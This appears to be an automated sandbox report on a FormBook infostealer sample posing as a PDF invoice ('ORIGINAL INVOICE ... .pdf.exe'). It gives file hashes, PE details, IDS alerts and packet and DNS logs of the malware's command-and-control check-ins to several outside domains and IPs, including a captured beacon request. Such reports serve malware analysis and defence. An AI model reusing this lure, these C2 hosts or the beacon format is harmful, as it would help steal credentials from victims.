                                https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                • 3.33.220.150

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Temp\297268BLQ

                                Download File
                                Process:C:\Windows\SysWOW64\RpcPing.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):0.9746603542602881
                                Encrypted:false
                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.7471443661983495
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:ORIGINAL INVOICE COAU7230734298.pdf.exe
                                File size:767'488 bytes
                                MD5:7d3ee1a73d9fbef171c785801ffcaff2
                                SHA1:2ad9a95c9038e4d61c6d9cbee63746454454d502
                                SHA256:1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
                                SHA512:47eed0fd3880965b6658a59cd012c7942d87f5df191c8e4505eb6635619e75cffdb51867b0ecb21b9dc185e8455fe16ee69ca977ca1a8e09a79b4a46df173dba
                                SSDEEP:12288:zXBE7tnCs0ul4P6CDhz6T2ORPWHsvP5t+0KgZBxSM:MkuaSCDBMesvRtbKj
                                TLSH:E2F4E0D03B36B319DDA96A30C629DDB493B81D68B040B9E35EDD3B97759C211AE0CF42
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............Z.... ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x4bc95a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbc9070x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x60c.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xbb5f00x70.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xba9600xbaa00a00a3f3b437793afac9e429a587ada8fFalse0.8996985934360349data7.754463700440127IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xbe0000x60c0x80076b0b748474bd8db5876cac0e88c5d17False0.3349609375data3.422694002308539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xc00000xc0x200558ef16a8c883bad0f4a9c3cd7cfdd8bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0xbe0900x37cdata0.4226457399103139
                                RT_MANIFEST0xbe41c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-02T02:06:28.163634+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45682585.159.66.9380TCP
                                2024-10-02T02:06:30.710433+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45682685.159.66.9380TCP
                                2024-10-02T02:06:33.257293+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45682785.159.66.9380TCP
                                2024-10-02T02:06:41.993230+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456829185.106.176.20480TCP
                                2024-10-02T02:06:44.549267+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456830185.106.176.20480TCP
                                2024-10-02T02:06:47.089054+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456831185.106.176.20480TCP
                                2024-10-02T02:06:56.491974+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45683352.223.13.4180TCP
                                2024-10-02T02:06:58.051773+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45683452.223.13.4180TCP
                                2024-10-02T02:07:00.520885+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45683552.223.13.4180TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 2, 2024 02:06:10.114978075 CEST5682480192.168.2.43.33.130.190
                                Oct 2, 2024 02:06:10.119842052 CEST80568243.33.130.190192.168.2.4
                                Oct 2, 2024 02:06:10.119973898 CEST5682480192.168.2.43.33.130.190
                                Oct 2, 2024 02:06:10.134159088 CEST5682480192.168.2.43.33.130.190
                                Oct 2, 2024 02:06:10.138941050 CEST80568243.33.130.190192.168.2.4
                                Oct 2, 2024 02:06:11.499744892 CEST80568243.33.130.190192.168.2.4
                                Oct 2, 2024 02:06:11.499890089 CEST80568243.33.130.190192.168.2.4
                                Oct 2, 2024 02:06:11.499949932 CEST5682480192.168.2.43.33.130.190
                                Oct 2, 2024 02:06:11.502477884 CEST5682480192.168.2.43.33.130.190
                                Oct 2, 2024 02:06:11.507261038 CEST80568243.33.130.190192.168.2.4
                                Oct 2, 2024 02:06:26.642410994 CEST5682580192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:26.647226095 CEST805682585.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:26.647306919 CEST5682580192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:26.657737970 CEST5682580192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:26.662539005 CEST805682585.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:28.163634062 CEST5682580192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:28.168736935 CEST805682585.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:28.168819904 CEST5682580192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:29.182111025 CEST5682680192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:29.186935902 CEST805682685.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:29.187077045 CEST5682680192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:29.197730064 CEST5682680192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:29.202481031 CEST805682685.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:30.710433006 CEST5682680192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:30.715749979 CEST805682685.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:30.715822935 CEST5682680192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:31.729351997 CEST5682780192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:31.734283924 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.734486103 CEST5682780192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:31.745949984 CEST5682780192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:31.750808001 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.750822067 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.750866890 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.750879049 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.750890017 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.751020908 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.751046896 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.751068115 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:31.751080036 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:33.257292986 CEST5682780192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:33.262444019 CEST805682785.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:33.262526035 CEST5682780192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.276392937 CEST5682880192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.281228065 CEST805682885.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:34.281338930 CEST5682880192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.288280964 CEST5682880192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.293102980 CEST805682885.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:34.961744070 CEST805682885.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:34.961829901 CEST805682885.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:34.961962938 CEST5682880192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.964490891 CEST5682880192.168.2.485.159.66.93
                                Oct 2, 2024 02:06:34.969379902 CEST805682885.159.66.93192.168.2.4
                                Oct 2, 2024 02:06:41.115338087 CEST5682980192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:41.120116949 CEST8056829185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:41.120203972 CEST5682980192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:41.159516096 CEST5682980192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:41.164269924 CEST8056829185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:41.993045092 CEST8056829185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:41.993130922 CEST8056829185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:41.993230104 CEST5682980192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:42.663794994 CEST5682980192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:43.682255030 CEST5683080192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:43.687200069 CEST8056830185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:43.687292099 CEST5683080192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:43.697858095 CEST5683080192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:43.702653885 CEST8056830185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:44.549160957 CEST8056830185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:44.549175978 CEST8056830185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:44.549267054 CEST5683080192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:45.210465908 CEST5683080192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:46.232800007 CEST5683180192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:46.237679958 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.237766027 CEST5683180192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:46.249010086 CEST5683180192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:46.253885031 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.253921986 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254010916 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254026890 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254050970 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254060030 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254082918 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254091024 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:46.254100084 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:47.083098888 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:47.088953018 CEST8056831185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:47.089054108 CEST5683180192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:47.757298946 CEST5683180192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:48.778343916 CEST5683280192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:48.783186913 CEST8056832185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:48.783269882 CEST5683280192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:48.795732975 CEST5683280192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:48.800549030 CEST8056832185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:49.661814928 CEST8056832185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:49.662029028 CEST8056832185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:49.662086964 CEST5683280192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:49.664629936 CEST5683280192.168.2.4185.106.176.204
                                Oct 2, 2024 02:06:49.669327021 CEST8056832185.106.176.204192.168.2.4
                                Oct 2, 2024 02:06:54.953913927 CEST5683380192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:54.958734989 CEST805683352.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:54.958842039 CEST5683380192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:54.982444048 CEST5683380192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:54.987442970 CEST805683352.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:56.491974115 CEST5683380192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:56.497034073 CEST805683352.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:56.497086048 CEST5683380192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:57.511419058 CEST5683480192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:57.516274929 CEST805683452.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:57.516365051 CEST5683480192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:57.529119968 CEST5683480192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:57.533869982 CEST805683452.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:58.051608086 CEST805683452.223.13.41192.168.2.4
                                Oct 2, 2024 02:06:58.051773071 CEST5683480192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:59.041743994 CEST5683480192.168.2.452.223.13.41
                                Oct 2, 2024 02:06:59.046566963 CEST805683452.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.058531046 CEST5683580192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:00.063366890 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.063472986 CEST5683580192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:00.076556921 CEST5683580192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:00.082271099 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082283020 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082290888 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082298994 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082305908 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082390070 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082397938 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082425117 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.082432985 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.520761013 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:00.520884991 CEST5683580192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:01.585638046 CEST5683580192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:01.634228945 CEST805683552.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:02.795258999 CEST5683680192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:02.800266981 CEST805683652.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:02.803952932 CEST5683680192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:02.813785076 CEST5683680192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:02.818840027 CEST805683652.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:03.289639950 CEST805683652.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:03.289655924 CEST805683652.223.13.41192.168.2.4
                                Oct 2, 2024 02:07:03.289887905 CEST5683680192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:03.296025038 CEST5683680192.168.2.452.223.13.41
                                Oct 2, 2024 02:07:03.300791979 CEST805683652.223.13.41192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 2, 2024 02:05:20.800586939 CEST53601981.1.1.1192.168.2.4
                                Oct 2, 2024 02:06:10.083976984 CEST6512153192.168.2.41.1.1.1
                                Oct 2, 2024 02:06:10.101419926 CEST53651211.1.1.1192.168.2.4
                                Oct 2, 2024 02:06:26.541539907 CEST5356353192.168.2.41.1.1.1
                                Oct 2, 2024 02:06:26.639929056 CEST53535631.1.1.1192.168.2.4
                                Oct 2, 2024 02:06:39.980294943 CEST5909953192.168.2.41.1.1.1
                                Oct 2, 2024 02:06:40.976269960 CEST5909953192.168.2.41.1.1.1
                                Oct 2, 2024 02:06:41.113035917 CEST53590991.1.1.1192.168.2.4
                                Oct 2, 2024 02:06:41.113049984 CEST53590991.1.1.1192.168.2.4
                                Oct 2, 2024 02:06:54.684022903 CEST5978853192.168.2.41.1.1.1
                                Oct 2, 2024 02:06:54.946362972 CEST53597881.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 2, 2024 02:06:10.083976984 CEST192.168.2.41.1.1.10xc2b4Standard query (0)www.yippie.worldA (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:26.541539907 CEST192.168.2.41.1.1.10x995fStandard query (0)www.kartal-nakliyat.xyzA (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:39.980294943 CEST192.168.2.41.1.1.10x2bStandard query (0)www.sidqwdf.funA (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:40.976269960 CEST192.168.2.41.1.1.10x2bStandard query (0)www.sidqwdf.funA (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:54.684022903 CEST192.168.2.41.1.1.10xfe31Standard query (0)www.resellnexa.shopA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 2, 2024 02:06:10.101419926 CEST1.1.1.1192.168.2.40xc2b4No error (0)www.yippie.worldyippie.worldCNAME (Canonical name)IN (0x0001)false
                                Oct 2, 2024 02:06:10.101419926 CEST1.1.1.1192.168.2.40xc2b4No error (0)yippie.world3.33.130.190A (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:10.101419926 CEST1.1.1.1192.168.2.40xc2b4No error (0)yippie.world15.197.148.33A (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:26.639929056 CEST1.1.1.1192.168.2.40x995fNo error (0)www.kartal-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                Oct 2, 2024 02:06:26.639929056 CEST1.1.1.1192.168.2.40x995fNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                Oct 2, 2024 02:06:26.639929056 CEST1.1.1.1192.168.2.40x995fNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:41.113035917 CEST1.1.1.1192.168.2.40x2bNo error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:41.113049984 CEST1.1.1.1192.168.2.40x2bNo error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                Oct 2, 2024 02:06:54.946362972 CEST1.1.1.1192.168.2.40xfe31No error (0)www.resellnexa.shop52.223.13.41A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.yippie.world
                                • www.kartal-nakliyat.xyz
                                • www.sidqwdf.fun
                                • www.resellnexa.shop

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.4568243.33.130.190804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:10.134159088 CEST497OUTGET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.yippie.world
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
